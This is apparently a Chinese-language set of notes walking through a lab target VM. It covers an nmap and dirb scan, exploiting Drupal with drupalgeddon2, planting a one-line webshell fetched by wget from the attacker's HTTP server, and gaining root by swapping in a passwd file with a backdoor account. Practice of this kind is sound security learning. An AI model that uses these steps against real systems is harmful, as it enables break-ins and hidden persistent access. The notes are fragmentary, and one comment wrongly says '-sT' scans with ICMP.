为什么要打靶机???---> 思路 ---> 靶机所需思路来提升单个漏洞攻击水平
靶场:专项漏洞练习---> 学会各种单向漏洞的攻击姿势(单项的攻击方式提升)
靶机:单个攻击项目---> 增长攻击方式/思路/经验(增加攻击思路于是姿势
首先打开kali 输入 ifconfig查询自己的ip
一、确定靶机地址
输入nmap 192.168.1.0/24 -sT #-sT 使用ICMP协议进行扫描
二、扫描网站的敏感目录
dirb http://192.168.1.28
三、对 192.168.1.28 /drupal页面做漏洞挖掘
通过Github 下载 Drupal exploit漏洞进行利用 拖到kali桌面
输入gem install highline
./drupalgeddon2.rb
系统账户 Linux系统的低权限账户 操作受限 需要进行权限提升 做网站的权限维持:---> 给网站留后门
拿到目标一点的权限立马做权限维持
蚁剑:网站后门的管理程序 网站后门: 一句话木马
开启HTTP服务 python3 -m http.server 8080
执行 wget http://192.168.1.36:8080/123.php 命令将木马下
验证网站后门的地址在蚁剑链接并执行命令
五、权限提升
- 下载passwd文件到本地
- 在本地添加后门账号保存 ?造出Linux操作系统中用户的密码加密值
-
将这个passwd下载回靶机中进行替换
-
蚁剑中执行wget http://192.168.1.36:8080/passwd -O passwd
-
?
-
拿到root用户的falg信息
-
?